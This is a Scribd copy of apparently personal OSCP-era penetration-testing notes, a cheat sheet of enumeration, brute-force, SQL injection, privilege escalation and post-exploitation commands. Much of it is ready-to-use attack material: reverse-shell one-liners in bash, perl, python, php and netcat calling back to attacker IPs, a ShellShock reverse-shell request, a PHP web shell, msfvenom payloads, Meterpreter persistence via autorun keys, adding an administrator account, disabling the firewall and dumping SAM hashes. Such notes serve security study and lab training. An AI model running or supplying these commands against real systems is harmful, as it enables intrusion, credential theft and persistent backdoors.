Scribd
Upload
53 views

Malikashish8 Github Io Walkthrough Notes

Uploaded by

hixiso1447
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
53 views

Malikashish8 Github Io Walkthrough Notes

Uploaded by

hixiso1447
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 19

Walkthrough About Me Pentes ng Notes

Methodology Notes essen ally from OSCP days


H p site
Enum
Misc
Methodology
SQLMAP
Discover service versions of open ports using nmap or manually. nmap: Use -p- for all ports Also make sure to run a udp scan with: nmap -sU -sV
Linux
Python Go for low hanging fruits by looking up exploits for service versions.
PHP
WordPress
H p site
Samaba Share
Bruteforce nikto -h
Password Cracking dirbuster / wfuzz
Encoding Burp
Rev Shell Ensure that you enum all h p/s ports
PHP web shell When searching for exploit search with CVE, service name (try generic when exact is not found)
Metasploit For bruteforcing creden als the order is:
msfconsole Default
Meterperter Easy - Try simple passwords such as username, password, admin, previously found pwd etc. when usernames are discovered or with default username.
POST Also try for PE.
Msfvenom Cewl
Persistence wordlist
Windows
SMB If you find an MD5 or some other hash - try to crack it quickly
MsSQL
When source or directry lis ng is available check for creden als for things like DB.
PE
BO
Python script Enum
Docker
netdiscover -r 10.11.1.0/24

OS xprobe2 10.11.1.133

nmap -sS -A -O -n -p1-65535 192.168.1.13

Dirbuster (with long list)


Hydra h ps://host
Use Burp to analyze and edit traffic

SMB (139,445):

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nbtscan -r 10.11.1.0/24
smbclient -L 10.11.1.31 -U anonymous
smbclient //192.168.25.67/wwwroot -U anonymous
Methodology
enum4linux -a 10.11.1.5
H p site
Enum
/root/scripts/nmap-smb.sh 10.11.1.5
Misc
SQLMAP nmap -p 139,445 --script=vuln 10.11.1.1
Linux
Python rpcclient -U "" 10.11.1.1
PHP
SNMP (UDP 161)
WordPress
Samaba Share
Bruteforce snmp-check 10.11.1.5

Password Cracking onesixtyone -c community 192.168.186.130


snmpwalk -c public -v1 192.168.186.130
Encoding
Rev Shell
PHP web shell SMTP nc to 25 port and then run VRFY bob
Metasploit
DNS Zone Transfer
msfconsole
Meterperter Figure out dns server: host -t ns foo.org host -t mx foo.org now a empt zone transfer for all the dns servers: host -l foo.org ns1.foo.org
POST
Msfvenom complete enumera on dnsenum foo.org following will a empt zone transfer dnsrecon -d megacorpone.com -t axfr
Persistence
Vulnerability Scanning nmap --script all <IP>
Windows
SMB NFS
MsSQL
PE rcpinfo -p <IP>
BO showmount <IP> -a
Python script mount 10.11.1.10:/sites/webdata ./testing
Docker
HTTP

cewl www.megacorpone.com -m 6 -w mega-cewl.txt

Mangle:

john --wordlist=mega-cewl.txt --rules --stdout > mega-mangled

Locate db path:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
/var/lib/mlocate/mlocate.db

hydra -l garry -F -P /usr/share/wordlists/rockyou.txt 10.11.1.73 -s 8080 http-post-form


Methodology "/php/index.php:tg=login&referer=index.php&login=login&sAuthType=Ovidentia&nickname=^USER^&password=^PASS^&submit=Login:F=Failed:H=Cookie\:
H p site OV3176019645=a4u215fgf3tj8718i0b1rj7ia5"
Enum
-F stop a er ge ng login
Misc
SQLMAP h p-post-form “<url>:<post data>:F=<fail text:H=<header>”
Linux
Python hydra -l root -P /root/rockyou.txt 10.11.1.71 ssh
PHP
WordPress
Samaba Share
Misc
Bruteforce
Password Cracking SQLMAP
Encoding
sqlmap -u http://192.168.1.15:8008/unisxcudkqjydw/vulnbank/client/login.php --method POST --data "username=1&password=pass" -p
Rev Shell
"username,password" --cookie="PHPSESSID=crp8r4pq35vv0fm1l5td32q922" --dbms=MySQL --text-only --level=5 --risk=2
PHP web shell
Metasploit
level ranges 1-5 and risk 1-3 (default 1)
msfconsole
use get parameter to dump all
Meterperter
POST sqlmap -u "http://192.168.203.134/imfadministrator/cms.php?pagename=upload" --cookie="PHPSESSID=1im32c1q8b54vr27eussjjp6n2" -p
Msfvenom pagename --level=5 --risk=3 -a
Persistence
Windows msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 -f elf > reverse.elf
SMB msfvenom -p cmd/unix/reverse_bash LHOST=192.168.203.130 LPORT=1234 -f raw > shell.sh
MsSQL msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.235 LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
PE
BO From h ps://netsec.ws/?p=331
Python script
Docker Linux
cut -c2- cut the first 2 characters rev: cat foo|rev reverse contents of cat

Python
Rev shell

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
s.connect(('192.168.3.222', 6660))
s.send("GET /" + buffer + " HTTP/1.1" + "\r\n\r\n")
s.close()
Methodology
H p site Python eval() and 2.7 read() exploit:
Enum
Misc __import__("os").system("netstat -antp|nc 192.168.203.130 1234")
SQLMAP
Deserializa on (Pickle) exploit template
Linux
Python
PHP def create_command(cmd, args, flags):
template = """csubprocess
WordPress
check_output
Samaba Share
(((S'{0}'
Bruteforce
S'{1}'
Password Cracking
S'{2}'
Encoding
ltR."""
Rev Shell
return template.format(cmd, args, flags)
PHP web shell
Metasploit hack = create_command('ls', '..', '-la')
msfconsole
Meterperter Port knocking
POST
Msfvenom for x in 27017 28017; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.11.1.237; done
Persistence
Windows Python script to read from port template
SMB
MsSQL #!/usr/bin/env python
PE import socket

BO
IP = '10.11.1.8'
Python script
PORT = 631
Docker
MSG = open('a').read()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
data = s.recv(1024)
s.send(MSG)
print data1
data2 = s.recv(1024)
print data2
s.close()

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
PHP
Methodology Covert LFI to see php code:
H p site
Enum http://10.11.1.24/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
Misc http://10.11.1.24/classes/phpmailer/class.cs_phpmailer.php?classes_dir=php://filter/convert.base64-
SQLMAP encode/resource=../../../../../var/www/image.php%00
Linux
Python WordPress
PHP
WordPress wpscan --url http://192.168.110.181:69 --enumerate u to enumerate and bruteforce users based on wordlist use: wpscan -u 10.11.1.234 --
Samaba Share wordlist /usr/share/wordlists/rockyou.txt --threads 50
Bruteforce
Password Cracking Samaba Share
Encoding
Rev Shell smbclient -L host
PHP web shell smbclient \\\\zimmerman\\public mypasswd
Metasploit smbclient //billy/EricsSecretStuff -u anonymous
msfconsole
Meterperter enum4linux -a 192.168.110.181 will do all sort of enumera ons on samba
POST
Msfvenom From h p://www.tldp.org/HOWTO/SMB-HOWTO-8.html Crunch to generate wordlist based on op ons
Persistence
crunch 10 10 -t %%%qwerty^ > craven.txt This creates wordlist with min 10 le ers and max 10 le ers star ng with 3 numbers, then string ‘qwerty’ then
Windows
special characters.
SMB
MsSQL Chrome browser user agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
PE Safari/537.36 Google bot: User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
BO
Python script Find file type based on pa ern when ‘file’ command does not work: h p://mark0.net/so -tridnet-e.html
Docker
find /proc -regex '\/proc\/[0-9]+\/fd\/.*' -type l -lname "*network*" -printf "%p -> %l\n" 2> /dev/null

MySql supports # for commen ng on top of –

Find text recursively in files in this folder

grep -rnwl '/path/to/somewhere/' -e "pattern"

wpscan to scan wordpress site for vulns

wpscan --url https://192.168.1.13:12380/blogblog/ --enumerate uap

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
ShellShock over h p when you get response from cgi-bin which have server info only

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import
Methodology socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.235\",1234));os.dup2(s.fileno(),0);
H p site os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" http://10.11.1.71/cgi-
Enum bin/admin.cgi
Misc
SQLMAP Bruteforce
Linux
Python user fcrackzip to brute force zip
PHP
cewl http://10.11.1.39/otrs/installer.pl>>cewl
WordPress
Samaba Share mangle with john?
Bruteforce
Password Cracking sort cewl | uniq >>cewl2
Encoding
Check cert:
Rev Shell
PHP web shell openssl s_client -connect 10.11.1.35:443
Metasploit
msfconsole Password Cracking
Meterperter
POST Wordpress password crack - h ps://github.com/micahflee/phpass_crack - see .251
Msfvenom
cat /usr/share/wordlists/rockyou.txt | python /root/labs/251/phpass_crack-master/phpass_crack.py pass.txt -v
Persistence
Windows it seems john does a be er job at php password cracking when using a wordlist john --wordlist=/root/rockyou.txt pass.txt
SMB
MsSQL echo gibs@noobcomp.com:$P$BR2C9dzs2au72.4cNZfJPC.iV8Ppj41>pass.txt
PE
BO Encoding
Python script
Docker HexToASCII

echo -n 666c6167307b7468655f717569657465 |xxd -r -p

Convert windows file to linux

cat file | dos2unix > file2

base64 -d

PUT to webserver: Use poster Ctrl+Alt+P in Firefox and set url containg file path and chose file and PUT.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
zip all files in this folder zip -r zipped.zip .

Covert py to .exe - pyinstaller: "C:\Program Files\Python27\python.exe" "C:\Program Files\Python27\Scripts\pyinstaller-script.py"


Methodology code.py
H p site

Misc
Enum
Rev Shell
SQLMAP
From h p://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Linux
Python Bash
PHP
WordPress Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
Samaba Share
bash -i >& /dev/tcp/10.11.0.235/443 0>&1
Bruteforce
Password Cracking PERL
Encoding
Rev Shell Here’s a shorter, feature-free version of the perl-reverse-shell:
PHP web shell
perl -e 'use
Metasploit
Socket;$i="10.11.0.235";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
msfconsole
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Meterperter
POST
Python
Msfvenom
Persistence This was tested under Linux / Python 2.7:
Windows
SMB python -c 'import

MsSQL socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.235",1234));os.dup2(s.fileno(),0);

PE os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

BO
Windows:
Python script
Docker "import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.235',1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"

PHP

This code assumes that the TCP connec on uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.11.0.235",443);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Methodology
Netcat
H p site
Enum Netcat is rarely present on produc on systems and even if it is there are several version of netcat, some of which don’t support the -e op on. nc -e /bin/sh
Misc 10.0.0.1 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might s ll be able to get your reverse shell back like this:
SQLMAP
Linux rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Python
PHP Java
WordPress
Samaba Share r = Runtime.getRuntime()
Bruteforce p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]

Password Cracking p.waitFor()

Encoding
Rev Shell
[Untested submission from anonymous reader]
PHP web shell
Metasploit xterm
msfconsole
Meterperter One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on
POST TCP port 6001.
Msfvenom
xterm -display 10.0.0.1:1
Persistence
Windows To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll
SMB need to authorise the target to connect to you (command also run on your host): xhost +targetip
MsSQL
PE PHP web shell
BO
Python script <pre><?php echo shell_exec($_GET['c']);?><pre/> In base 64 PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJF9HRVRbJ2MnXSk7Pz48cHJlLz4K
Docker
cmd.exe >& /dev/tcp/10.11.0.235/80 0>&1

Metasploit
msfconsole

set exploit/name #select exploit


set PAYLOAD payload/name # select payload

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
show options # show options for selected payloads
exploit # to start exploit
show sessions
Methodology session -i 2 #interact with session number 2
H p site # Ctrl+Z - send session to background
Enum
Misc Meterperter
SQLMAP
Linux sysinfo #display info
Python
PHP getuid
WordPress getsystem #windows only
Samaba Share
Bruteforce POST
Password Cracking
Encoding meterpereter> use mimikatz
Rev Shell
help mimikatz
PHP web shell
Metasploit
msfconsole Msfvenom
Meterperter
POST msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le>shell
Msfvenom msfvenom -p windows/shell_bind_tcp -f exe >labs/31/shell.exe
Persistence msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4444 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le >
Windows msfvenom -p windows/shell_reverse__tcp -f asp LHOST=10.11.0.235 LPORT=443 -o labs/229/shell.asp

SMB
MsSQL
PE root@kali:~/labs/237/davfs# msfvenom --help-platforms
BO Platforms
Python script aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nod
Docker
root@kali:~/labs/237/davfs# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, ms
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vb

Meterpreter Handler:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp
Methodology
msf exploit(handler) > set LHOST <Listening_IP> (for example set LHOST 192.168.5.55)
H p site
msf exploit(handler) > set LPORT <Listening_Port> (for example set LPORT 4444)
Enum
msf exploit(handler) > exploit -z
Misc
SQLMAP
Linux Executable formats (-f)
Python asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, ms
PHP Transform formats
WordPress bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vb

Samaba Share
Bruteforce Platforms (--platform)
aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nod
Password Cracking
Encoding
Reverse Shells:
Rev Shell
set payload linux/armbe/shell_bind_tcp set payload linux/ppc64/shell_reverse_tcp set payload linux/
PHP web shell
set payload linux/armle/exec set payload linux/x64/exec set payload linux/
Metasploit
set payload linux/armle/mettle/bind_tcp set payload linux/x64/mettle/bind_tcp set payload linux/
msfconsole
set payload linux/armle/mettle/reverse_tcp set payload linux/x64/mettle/reverse_tcp set payload linux/
Meterperter
set payload linux/armle/shell/bind_tcp set payload linux/x64/shell/bind_tcp set payload linux/
POST set payload linux/armle/shell/reverse_tcp set payload linux/x64/shell/reverse_tcp set payload linux/
Msfvenom set payload linux/armle/shell_bind_tcp set payload linux/x64/shell_bind_tcp set payload linux/
Persistence set payload linux/armle/shell_reverse_tcp set payload linux/x64/shell_bind_tcp_random_port set payload linux/
Windows set payload linux/mipsbe/exec set payload linux/x64/shell_reverse_tcp set payload linux/
SMB set payload linux/mipsbe/mettle/reverse_tcp set payload linux/x86/chmod set payload linux/
MsSQL set payload linux/mipsbe/reboot set payload linux/x86/exec set payload linux/
PE set payload linux/mipsbe/shell/reverse_tcp set payload linux/x86/meterpreter/bind_ipv6_tcp set payload linux/
BO set payload linux/mipsbe/shell_bind_tcp set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid set payload linux/
Python script set payload linux/mipsbe/shell_reverse_tcp set payload linux/x86/meterpreter/bind_nonx_tcp set payload linux/
Docker set payload linux/mipsle/exec set payload linux/x86/meterpreter/bind_tcp set payload linux/
set payload linux/mipsle/mettle/reverse_tcp set payload linux/x86/meterpreter/bind_tcp_uuid set payload linux/
set payload linux/mipsle/reboot set payload linux/x86/meterpreter/reverse_ipv6_tcp set payload linux/
set payload linux/mipsle/shell/reverse_tcp set payload linux/x86/meterpreter/reverse_nonx_tcp set payload linux/
set payload linux/mipsle/shell_bind_tcp set payload linux/x86/meterpreter/reverse_tcp set payload linux/
set payload linux/mipsle/shell_reverse_tcp set payload linux/x86/meterpreter/reverse_tcp_uuid set payload linux/
set payload linux/ppc/shell_bind_tcp set payload linux/x86/metsvc_bind_tcp set payload linux/
set payload linux/ppc/shell_reverse_tcp set payload linux/x86/metsvc_reverse_tcp set payload linux/
set payload linux/ppc64/shell_bind_tcp set payload linux/x86/mettle/bind_ipv6_tcp

set payload windows/dllinject/bind_hidden_ipknock_tcp set payload windows/patchupdllinject/bind_tcp_uuid

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
set payload windows/dllinject/bind_hidden_tcp set payload windows/patchupdllinject/reverse_ipv6_tcp
set payload windows/dllinject/bind_ipv6_tcp set payload windows/patchupdllinject/reverse_nonx_tcp
set payload windows/dllinject/bind_ipv6_tcp_uuid set payload windows/patchupdllinject/reverse_ord_tcp
Methodology set payload windows/dllinject/bind_nonx_tcp set payload windows/patchupdllinject/reverse_tcp
H p site set payload windows/dllinject/bind_tcp set payload windows/patchupdllinject/reverse_tcp_allports
Enum set payload windows/dllinject/bind_tcp_rc4 set payload windows/patchupdllinject/reverse_tcp_dns
Misc set payload windows/dllinject/bind_tcp_uuid set payload windows/patchupdllinject/reverse_tcp_rc4
SQLMAP set payload windows/dllinject/reverse_hop_http set payload windows/patchupdllinject/reverse_tcp_rc4_dns
Linux set payload windows/dllinject/reverse_http set payload windows/patchupdllinject/reverse_tcp_uuid
Python set payload windows/dllinject/reverse_http_proxy_pstore set payload windows/patchupmeterpreter/bind_hidden_ipknock_tcp
PHP set payload windows/dllinject/reverse_ipv6_tcp set payload windows/patchupmeterpreter/bind_hidden_tcp
WordPress set payload windows/dllinject/reverse_nonx_tcp set payload windows/patchupmeterpreter/bind_ipv6_tcp
Samaba Share set payload windows/dllinject/reverse_ord_tcp set payload windows/patchupmeterpreter/bind_ipv6_tcp_uuid

Bruteforce set payload windows/dllinject/reverse_tcp set payload windows/patchupmeterpreter/bind_nonx_tcp


set payload windows/dllinject/reverse_tcp_allports set payload windows/patchupmeterpreter/bind_tcp
Password Cracking
set payload windows/dllinject/reverse_tcp_dns set payload windows/patchupmeterpreter/bind_tcp_rc4
Encoding
set payload windows/dllinject/reverse_tcp_rc4 set payload windows/patchupmeterpreter/bind_tcp_uuid
Rev Shell
set payload windows/dllinject/reverse_tcp_rc4_dns set payload windows/patchupmeterpreter/reverse_ipv6_tcp
PHP web shell
set payload windows/dllinject/reverse_tcp_uuid set payload windows/patchupmeterpreter/reverse_nonx_tcp
Metasploit
set payload windows/dllinject/reverse_winhttp set payload windows/patchupmeterpreter/reverse_ord_tcp
msfconsole
set payload windows/dns_txt_query_exec set payload windows/patchupmeterpreter/reverse_tcp
Meterperter
set payload windows/download_exec set payload windows/patchupmeterpreter/reverse_tcp_allports
POST set payload windows/exec set payload windows/patchupmeterpreter/reverse_tcp_dns
Msfvenom set payload windows/loadlibrary set payload windows/patchupmeterpreter/reverse_tcp_rc4
Persistence set payload windows/messagebox set payload windows/patchupmeterpreter/reverse_tcp_rc4_dns
Windows set payload windows/meterpreter/bind_hidden_ipknock_tcp set payload windows/patchupmeterpreter/reverse_tcp_uuid
SMB set payload windows/meterpreter/bind_hidden_tcp set payload windows/powershell_bind_tcp
MsSQL set payload windows/meterpreter/bind_ipv6_tcp set payload windows/powershell_reverse_tcp
PE set payload windows/meterpreter/bind_ipv6_tcp_uuid set payload windows/shell/bind_hidden_ipknock_tcp
BO set payload windows/meterpreter/bind_nonx_tcp set payload windows/shell/bind_hidden_tcp
Python script set payload windows/meterpreter/bind_tcp set payload windows/shell/bind_ipv6_tcp
Docker set payload windows/meterpreter/bind_tcp_rc4 set payload windows/shell/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_tcp_uuid set payload windows/shell/bind_nonx_tcp
set payload windows/meterpreter/reverse_hop_http set payload windows/shell/bind_tcp
set payload windows/meterpreter/reverse_http set payload windows/shell/bind_tcp_rc4
set payload windows/meterpreter/reverse_http_proxy_pstore set payload windows/shell/bind_tcp_uuid
set payload windows/meterpreter/reverse_https set payload windows/shell/reverse_ipv6_tcp
set payload windows/meterpreter/reverse_https_proxy set payload windows/shell/reverse_nonx_tcp
set payload windows/meterpreter/reverse_ipv6_tcp set payload windows/shell/reverse_ord_tcp
set payload windows/meterpreter/reverse_nonx_tcp set payload windows/shell/reverse_tcp
set payload windows/meterpreter/reverse_ord_tcp set payload windows/shell/reverse_tcp_allports
set payload windows/meterpreter/reverse_tcp set payload windows/shell/reverse_tcp_dns

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
set payload windows/meterpreter/reverse_tcp_allports set payload windows/shell/reverse_tcp_rc4
set payload windows/meterpreter/reverse_tcp_dns set payload windows/shell/reverse_tcp_rc4_dns
set payload windows/meterpreter/reverse_tcp_rc4 set payload windows/shell/reverse_tcp_uuid
Methodology set payload windows/meterpreter/reverse_tcp_rc4_dns set payload windows/shell_bind_tcp
H p site set payload windows/meterpreter/reverse_tcp_uuid set payload windows/shell_bind_tcp_xpfw
Enum set payload windows/meterpreter/reverse_winhttp set payload windows/shell_hidden_bind_tcp
Misc set payload windows/meterpreter/reverse_winhttps set payload windows/shell_reverse_tcp
SQLMAP set payload windows/meterpreter_bind_tcp set payload windows/speak_pwned
Linux set payload windows/meterpreter_reverse_http set payload windows/upexec/bind_hidden_ipknock_tcp
Python set payload windows/meterpreter_reverse_https set payload windows/upexec/bind_hidden_tcp
PHP set payload windows/meterpreter_reverse_ipv6_tcp set payload windows/upexec/bind_ipv6_tcp
WordPress set payload windows/meterpreter_reverse_tcp set payload windows/upexec/bind_ipv6_tcp_uuid

Samaba Share set payload windows/metsvc_bind_tcp set payload windows/upexec/bind_nonx_tcp

Bruteforce set payload windows/metsvc_reverse_tcp set payload windows/upexec/bind_tcp


set payload windows/patchupdllinject/bind_hidden_ipknock_tcp set payload windows/upexec/bind_tcp_rc4
Password Cracking
set payload windows/patchupdllinject/bind_hidden_tcp set payload windows/upexec/bind_tcp_uuid
Encoding
set payload windows/patchupdllinject/bind_ipv6_tcp set payload windows/upexec/reverse_ipv6_tcp
Rev Shell
set payload windows/patchupdllinject/bind_ipv6_tcp_uuid set payload windows/upexec/reverse_nonx_tcp
PHP web shell
set payload windows/patchupdllinject/bind_nonx_tcp set payload windows/upexec/reverse_ord_tcp
Metasploit
set payload windows/patchupdllinject/bind_tcp set payload windows/upexec/reverse_tcp
msfconsole
set payload windows/patchupdllinject/bind_tcp_rc4 set payload windows/upexec/reverse_tcp_allports
Meterperter
POST set payload bsd/sparc/shell_bind_tcp set payload bsd/x64/shell_bind_tcp set payload bsd/x64/shell_reverse_tc
Msfvenom set payload bsd/sparc/shell_reverse_tcp set payload bsd/x64/shell_bind_tcp_small set payload bsd/x86/exec
Persistence set payload bsd/x64/exec set payload bsd/x64/shell_reverse_ipv6_tcp set payload bsd/x86/metsvc_bind_tcp
Windows set payload bsd/x64/shell_bind_ipv6_tcp set payload bsd/x64/shell_reverse_tcp set payload bsd/x86/metsvc_reverse_t
SMB
MsSQL
PE Persistence
BO
Python script meterpreter > run persistence -h

Docker
Meterpreter Script for crea ng a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching exploit/multi/handler to connect to the agent


-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
Methodology -p <opt> The port on which the system running Metasploit is listening
H p site -r <opt> The IP of the system running Metasploit listening for the connect back
Enum
Misc
SQLMAP meterpreter > run persistence -A -L C:\\ -X -U -i 10 -r 10.11.0.235 -p 4910
Linux [*] Running Persistence Script
Python [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DJ_20170216.2235/DJ_20170216.2235.rc
PHP [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4910
WordPress [*] Persistent agent script is 99650 bytes long

Samaba Share [+] Persistent Script written to C:\\pGjIiHMHVx.vbs

Bruteforce [*] Starting connection handler at port 4910 for windows/meterpreter/reverse_tcp


[+] exploit/multi/handler started!
Password Cracking
[*] Executing script C:\\pGjIiHMHVx.vbs
Encoding
[+] Agent executed with PID 1504
Rev Shell
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU
PHP web shell
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU
Metasploit
msfconsole
Meterperter Windows
POST
Msfvenom
whoami
Persistence
net users
Windows
systeminfo
SMB
net user <bob>
MsSQL
set
PE
echo %USERDOMAIN%/%USERNAME%
BO
Python script
Run powershell command: powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -Command "dir"
Docker
Run local smb server to copy files to windows hosts easily:

1. copy files to /root/smb/


2. service smb start
3. copy \10.11.0.235\file.exe . # on windows target

Add user

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
run getgui -u myadmin -p Pass1234
net user myadmin Pass1234 /add
net localgroup Administrators myadmin /add
Methodology
rdesktop -u myadmin -p Pass1234 10.11.1.218 -g 80%
H p site
Enum
Run as: psexec -u alice -p alicei123 C:\HFS\shellm80c.exe
Misc
SQLMAP SAM: So the three loca ons of the SAM\Hashes are:
Linux
Python %systemroot%\system32\config - c:\Windows\System32\Config\
PHP %systemroot%\repair (but only if rdisk has been run) - C:\Windows\Repair
WordPress In the registry under HKEY_LOCAL_MACHINE\SAM Use pwdump3 to extract hasches from these and run john:
Samaba Share
samdump2 system SAM -o hashes.txt
Bruteforce
john hashes.txt
Password Cracking
Encoding
nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target> 10.11.1.5
Rev Shell
PHP web shell meterpreter > run post/multi/recon/local_exploit_suggester
Metasploit
msfconsole Firewall XP netsh firewall set opmode mode=DISABLE New: netsh advfirewall set allprofiles state off
Meterperter
RDP:
POST
Msfvenom
run getgui -u myuser -p mypass
Persistence
rdesktop -u myuser -p mypass 10.11.1.226 -g 90%
Windows
SMB
Lookup windows version from product version in C:\Windows\explorer.exe: h p://www.geoffchappell.com/studies/windows/shell/explorer/history/index.htm
MsSQL
h ps://support.microso .com/en-us/help/969393/informa on-about-internet-explorer-versions
PE
BO PE (switch admin user to NT Authority/System): psexec.exe -s cmd
Python script
Docker post/windows/gather/credentials/gpp Meterpreter Search GPP

Windows Exploit Suggester

Compile i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe

FTP

atftpd --daemon --port 69 `pwd`


c=tftp -i 10.11.0.235 get shellM.exe

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
VNC - RealVNC4

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 -v SecurityTypes -d None


Methodology
Successfully set SecurityTypes of REG_SZ.
H p site
Enum
(Also try HKCU\So ware\RealVNC\WinVNC4\SecurityTypes if above does not work)
Misc
SQLMAP
SMB
Linux
Python service smbd start /root/smb is shared
PHP
WordPress Mount Using: net use z: \\10.11.0.235\oscp\
Samaba Share
Bruteforce nbtscan -r 10.11.1.0/24
Password Cracking enum4linux -a 10.11.1.5
Encoding root@kali:~# nmblookup -A 10.11.1.136
Rev Shell smbclient -L \\host -I 10.11.1.136 -N
PHP web shell smbclient //host/Bob\ Share -I 10.11.1.136 -N
Metasploit
msfconsole MsSQL
Meterperter
POST h ps://www.iodigitalsec.com/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/
Msfvenom
Persistence sqsh -S10.11.1.31 -Usa -Ppoiuytrewq -Dbankdb`
Windows vi ~/.sqshrc
SMB \set username=sa
MsSQL \set password=password
PE \set style=vert
BO
Python script root@kali:~/# sqsh -S s128
Docker sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'whoami'
2> go
output: NT AUTHORITY\SYSTEM
output: NULL
(return status = 0)
